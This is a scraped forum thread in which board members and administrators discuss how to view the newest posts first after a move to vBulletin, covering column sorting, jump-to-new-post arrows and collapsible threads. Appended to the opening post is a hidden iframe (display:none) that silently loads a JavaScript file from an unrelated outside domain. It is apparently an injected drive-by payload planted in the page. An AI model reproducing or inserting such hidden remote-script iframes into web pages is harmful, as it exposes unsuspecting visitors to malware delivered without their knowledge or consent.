+ Reply to Thread

Viewing new posts first

With the switch to vbulletin, I once again see all threads with the oldest posts first. I was able to change the old board to view new posts first, but I have not been able to locate any place to make that change with vbulletin.

Help!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

In each forum there is a sort by colum option by clicking the colum header.

Administrator
    when you log on and there are new posts, there should be a arrow next to the topic on the left hand side of the board. click on that and it will take you to the first post since your last visit...

Re: Viewing new posts first

Originally posted by davemayo
    With the switch to vbulletin, I once again see all threads with the oldest posts first. I was able to change the old board to view new posts first, but I have not been able to locate any place to make that change with vbulletin.

Help!!!
    I like seeing the oldest post first. Nice that VB allows you to easily sort as you will.

Gary

Originally posted by HoTSynC
    In each forum there is a sort by colum option by clicking the colum header.
    I think what davemayo is asking for is a reverse order of the posts inside a thread. The only thing I have seen is in the control panel for the whole board. I could post a poll and ask if people want it to be changed but I think the consensus would be to keep it the way it is....

I'll look around for a hack to add this option... if anyone knows of one please let me know....

Thanks
    -=Jimmyjoe=-

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

Post inside thread

I agree, the post inside the thread would be nice to be able to sort by newest first so you can catch up with out having to go all the way through a long post.

But hey, it works for me either way, this board is a mound of information and you might just learn something from reading all the posts

I couldn't find any hacks but from the thread view in the forum, you can jump right to the last post by clicking the little arrow button next to the last post information (Last colum on thread in forum view). See picture attached.
    Attached Thumbnails Attached Thumbnails Viewing new posts first-capture.jpg  

Administrator
    right.

also, when you log on there are down arrows to the left of the subject that you can tap. they will take you to the first new message in the thread since your last visit.

I'm cool with it either way myself... the only real benefit to me in having it sort most recent first is that it makes it quicker to check the boards from the road on my 6035 (which I do fairly often since I get notification by SMS). Also, since I check the boards so frequently the most recent post is the only one I haven't read in most cases (except for the past few days... I can't keep up with you guys! Looks like the switch over to vBulletin has everybody back in the swing of things, which is great!). But when at a computer clicking on the arrow to go to the first unread post works well. Also, I usually just access new posts to threads I'm following by just clicking on the URL in my notification e-mail.
    Please visit my picture site: Robert-O-Rama :)

To try to aleviate this problem, I have added the ability to expand and collapse threads in posts. With this ability, you can set in your personal control panel that read posts are automatically collapsed... This makes it very easy to read only the new posts...

Let me know what you think...
    -=Jimmyjoe=-